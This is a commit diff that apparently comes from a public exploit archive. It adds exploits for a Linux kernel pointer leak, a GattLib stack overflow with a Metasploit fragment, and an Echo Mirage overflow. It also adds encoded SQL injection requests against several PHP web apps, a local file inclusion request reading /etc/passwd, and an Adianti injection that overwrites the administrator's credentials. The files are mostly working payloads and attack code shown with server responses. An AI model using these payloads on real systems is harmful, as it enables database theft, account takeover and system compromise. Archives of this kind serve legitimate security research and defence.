DB: 2019-01-22

11 changes to exploits/shellcodes Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer Echo Mirage 3.1 - Buffer Overflow (PoC) GattLib 0.2 - Stack Buffer Overflow Kepler Wallpaper Script 1.1 - SQL Injection Coman 1.0 - 'id' SQL Injection Reservic 1.0 - 'id' SQL Injection MoneyFlux 1.0 - 'id' SQL Injection PHP Dashboards NEW 5.8 - 'dashID' SQL Injection PHP Dashboards NEW 5.8 - Local File Inclusion PHP Uber-style GeoTracking 1.1 - SQL Injection Adianti Framework 5.5.0 - SQL Injection
2019-01-22 05:01:54 +00:00 · 2019-01-22 05:01:54 +00:00 · 2ad3a5e94e
commit 2ad3a5e94e
parent 40d3df51a4
12 changed files with 495 additions and 0 deletions
--- a/exploits/linux/dos/46208.c
+++ b/exploits/linux/dos/46208.c
@ -0,0 +1,50 @@
 #define _GNU_SOURCE
 #define _BSD_SOURCE
 #include <sys/timex.h>
 #include <stdio.h>
 #include <stdint.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/wait.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <sys/ipc.h>
 #include <sys/sem.h>
 #include <sys/stat.h>
 #include <sys/mman.h>
 #include <sys/resource.h>
 #include <sys/syscall.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <unistd.h>
 #include <kptr-lib.h>
 // Ubuntu 4.13.0-16-generic
 // gcc -o poc poc.c -m32
 struct timex time;
 int main(int argc, char **argv)
 {
 	int r;
 	unsigned long long stack_offset, kernel_base;
 	unsigned int leak_value;
 	unsigned int high = 0xffffffff;
 	memset(&time, 0, sizeof(time));
 	time.modes = 0x8000;
 	mmap(0,0xa000,3,2022,-1,0);
 	adjtimex(&time);    
 	leak_value = time.tai;
 	printf("--> leak_value : %x\n", leak_value);
 	memcpy(&kernel_base, &leak_value, 4);
 	memcpy((char *)&kernel_base + 4, &high, 4);
 	stack_offset = 0x1fc4a4;
 	kernel_base = leak_value - stack_offset;
 	printf("--> kernel_stack_base : %llx\n", kernel_base);
 	return 0;
 }
--- a/exploits/linux/remote/46215.rb
+++ b/exploits/linux/remote/46215.rb
@ -0,0 +1,60 @@
 Exploit Title: stack-based overflow
 # Date: 2019-11-21
 # Exploit Author: Dhiraj Mishra
 # Vendor Homepage: http://labapart.com/
 # Software Link: https://github.com/labapart/gattlib/issues/81
 # Version: 0.2
 # Tested on: Linux 4.15.0-38-generic
 # CVE: CVE-2019-6498
 # References:
 # https://github.com/labapart/gattlib/issues/81
 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498
 ## Summary:
 While fuzzing gattlib (Gattlib is a library to access GATT information from
 BLE (Bluetooth Low Energy) devices) using clang 6.0 with ASAN a stack-based
 buffer-overflow was observed.
 ## Vulnerable code from gattlib.c
 // Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'
 strncpy(device_address_str, dst, sizeof(device_address_str));
 for (i = 0; i < strlen(device_address_str); i++) {
 if (device_address_str[i] == ':') {
 device_address_str[i] = '_';
 }
 }
 ## Vulnerable code from discover.c
 if (argc != 2) {
 printf("%s <device_address>\n", argv[0]);
 return 1;
 }
 connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,
 0, 0);
 if (connection == NULL) {
 fprintf(stderr, "Fail to connect to the bluetooth device.\n");
 return 1;
 }
 ## PoC
 ./discover `python -c 'print "A"*20'`
 ## MSF code
 def exploit
    connect
    print_status("Sending #{payload.encoded.length} byte payload...")
    # Building the buffer for transmission
    buf = "A" * 20
    buf += [ target.ret ].pack('V')
    buf += payload.encoded
    sock.put(buf)
    sock.get
    handler
 end
--- a/exploits/php/webapps/46207.txt
+++ b/exploits/php/webapps/46207.txt
@ -0,0 +1,39 @@
 # Exploit Title: Kepler Wallpaper Script 1.1 - SQL Injection
 # Dork: N/A
 # Date: 2019-01-19
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://keplerwallpapers.online/
 # Software Link: https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script
 # Version: 1.1
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]//[PATH]/category/xxx[SQL]
 # 
 GET /[PATH]/category/xxx%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=6963a7f072dbf72fb4cb420c9f5ad80a; ResolutionWidthAuto=1366; ResolutionHeightAuto=768; FilterType=Auto
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Sat, 19 Jan 2019 09:01:06 GMT
 Server: Apache
 X-Powered-By: PHP/5.6.37
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Access-Control-Allow-Origin: *
 Strict-Transport-Security: max-age=31536000
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/46209.txt
+++ b/exploits/php/webapps/46209.txt
@ -0,0 +1,38 @@
 # Exploit Title: Coman - Company Management System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2019-01-20
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://ragob.com/
 # Software Link: https://codecanyon.net/item/coman-company-management-system/17799270
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=task&id=[SQL]&backTo=dashboard
 # 
 GET /[PATH]/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Sun, 20 Jan 2019 12:59:10 GMT
 Server: Apache/2.4.10 (Debian)
 X-Powered-By: PHP/7.0.28
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Vary: Accept-Encoding
 Keep-Alive: timeout=5, max=99
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
--- a/exploits/php/webapps/46210.txt
+++ b/exploits/php/webapps/46210.txt
@ -0,0 +1,38 @@
 # Exploit Title: Reservic - Reserves Management System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2019-01-20
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://ragob.com/
 # Software Link: https://codecanyon.net/item/reservic-reserves-management-system/11736786
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=[SQL]&backTo=dashboard
 # 
 GET /[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Sun, 20 Jan 2019 13:01:16 GMT
 Server: Apache/2.4.10 (Debian)
 X-Powered-By: PHP/7.0.28
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Vary: Accept-Encoding
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
--- a/exploits/php/webapps/46211.txt
+++ b/exploits/php/webapps/46211.txt
@ -0,0 +1,38 @@
 # Exploit Title: MoneyFlux - Cashflow Management System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2019-01-20
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://ragob.com/
 # Software Link: https://codecanyon.net/item/moneyflux-laravel-5-cashflow-system/21577611
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php/framework-crud-updateaction?id=[SQL]&crud=expense
 # 
 GET /[PATH]/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Sun, 20 Jan 2019 12:39:58 GMT
 Server: Apache/2.4.10 (Debian)
 X-Powered-By: PHP/7.0.28
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Vary: Accept-Encoding
 Keep-Alive: timeout=5, max=97
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
--- a/exploits/php/webapps/46212.txt
+++ b/exploits/php/webapps/46212.txt
@ -0,0 +1,37 @@
 # Exploit Title: PHP Dashboards NEW 5.8 - SQL Injection
 # Dork: N/A
 # Date: 2019-01-21
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://dataninja.biz
 # Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
 # Version: 5.8
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/php/save/savedescriptions.php?dashID=[SQL]
 # 
 GET /[PATH]/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 20 Jan 2019 21:08:05 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Host-Header: 192fc2e7e50945beb8231a492d6a8024
 X-Proxy-Cache: MISS
--- a/exploits/php/webapps/46213.txt
+++ b/exploits/php/webapps/46213.txt
@ -0,0 +1,36 @@
 # Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
 # Dork: N/A
 # Date: 2019-01-21
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://dataninja.biz
 # Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
 # Version: 5.8
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/php/file/read.php
 # 
 POST /[PATH]/php/file/read.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 37
 Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 filename=../../../../../../etc/passwd: undefined
 HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 20 Jan 2019 20:56:25 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Host-Header: 192fc2e7e50945beb8231a492d6a8024
--- a/exploits/php/webapps/46214.txt
+++ b/exploits/php/webapps/46214.txt
@ -0,0 +1,85 @@
 # Exploit Title: PHP Uber-style GeoTracking 1.1 - SQL Injection
 # Dork: N/A
 # Date: 2019-01-21
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://dataninja.biz
 # Software Link: https://codecanyon.net/item/php-uberstyle-geotracking/20320021
 # Version: 1.1
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/php/profile/index.php
 # 
 POST /[PATH]/php/profile/index.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate, br
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 354
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
 HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 20 Jan 2019 21:47:06 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Host-Header: 192fc2e7e50945beb8231a492d6a8024
 # POC: 
 # 2)
 # http://localhost/[PATH]/php/profile/index.php
 # 
 POST /[PATH]/php/profile/index.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate, br
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 355
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 mapkey=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
 HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 20 Jan 2019 21:46:37 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Host-Header: 192fc2e7e50945beb8231a492d6a8024
 # POC: 
 # 3)
 # http://localhost/[PATH]/php/photos/index.php
 # 
 POST /[PATH]/php/photos/index.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate, br
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 231
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2d%2d%20%2d: undefined
 HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 20 Jan 2019 21:49:23 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Host-Header: 192fc2e7e50945beb8231a492d6a8024
--- a/exploits/php/webapps/46217.txt
+++ b/exploits/php/webapps/46217.txt
@ -0,0 +1,30 @@
 # Exploit Title: [SQL Injection in Adianti Framework]
 # Date: [2018-12-18]
 # Exploit Author: [Joner de Mello Assolin]
 # Vendor Homepage: [https://www.adianti.com.br]
 # Version: [5.5.0 and 5.6.0] (REQUIRED)
 # Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
 # Software Link: [https://www.adianti.com.br/download-center?app=template]
 The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system, 
 by editing the profile itself.
 POC:
 1-Register an ordinary user or use the framework standard(user=user password=user)
 2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit
 3- In the field name enter SQL injection and click Save:
 (SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#
 4-Go to the login screen and enter username and password: Now you can log in as administrator!.
 USER: anonymous
 PASSWORD: anonymous
--- a/exploits/windows/dos/46216.py
+++ b/exploits/windows/dos/46216.py
@ -0,0 +1,33 @@
 #!/usr/bin/python
 # Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
 # Date: 21-01-2019
 # Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
 # Version: 3.1 (x64)
 # Exploit Author: InitD Community
 # Contact: https://twitter.com/initd_sh
 # Website: http://initd.sh/
 # Tested on: Windows 7
 """
 Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste  in "action" field. --> BOoo0m.
 Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
 This Bug Identified by Touhid M.Shaikh
 """
 buffer = "A"*24241
 RBP = "B"*8
 PAD = "C"*50
 evil = buffer + RBP + PAD
 evil_file = open("Echo-Mirage-BoF-POC.txt","w")
 evil_file.write(evil)
 evil_file.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6268,6 +6268,8 @@ id,file,description,date,author,type,platform,port
 46203,exploits/windows/dos/46203.txt,"Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
 46204,exploits/windows/dos/46204.js,"Microsoft Edge Chakra - 'InitClass' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
 46205,exploits/windows/dos/46205.js,"Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free",2019-01-18,"Google Security Research",dos,windows,
 46208,exploits/linux/dos/46208.c,"Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer",2019-01-21,wally0813,dos,linux,
 46216,exploits/windows/dos/46216.py,"Echo Mirage 3.1 - Buffer Overflow (PoC)",2019-01-21,"InitD Community",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17108,6 +17110,7 @@ id,file,description,date,author,type,platform,port
 46143,exploits/hardware/remote/46143.rb,"Hootoo HT-05 - Remote Code Execution (Metasploit)",2019-01-14,"Andrei Manole",remote,hardware,
 46201,exploits/cgi/remote/46201.rb,"Webmin 1.900 - Remote Command Execution (Metasploit)",2019-01-18,AkkuS,remote,cgi,10000
 46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,
 46215,exploits/linux/remote/46215.rb,"GattLib 0.2 - Stack Buffer Overflow",2019-01-21,"Dhiraj Mishra",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40684,3 +40687,11 @@ id,file,description,date,author,type,platform,port
 46192,exploits/php/webapps/46192.txt,"phpTransformer 2016.9 - Directory Traversal",2019-01-18,"Ihsan Sencan",webapps,php,80
 46200,exploits/php/webapps/46200.txt,"Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings",2019-01-18,"Praveen Sutar",webapps,php,80
 46206,exploits/php/webapps/46206.txt,"Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload",2019-01-18,_jazz______,webapps,php,80
 46207,exploits/php/webapps/46207.txt,"Kepler Wallpaper Script 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
 46209,exploits/php/webapps/46209.txt,"Coman 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
 46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
 46211,exploits/php/webapps/46211.txt,"MoneyFlux 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
 46212,exploits/php/webapps/46212.txt,"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
 46213,exploits/php/webapps/46213.txt,"PHP Dashboards NEW 5.8 - Local File Inclusion",2019-01-21,"Ihsan Sencan",webapps,php,
 46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,
 46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,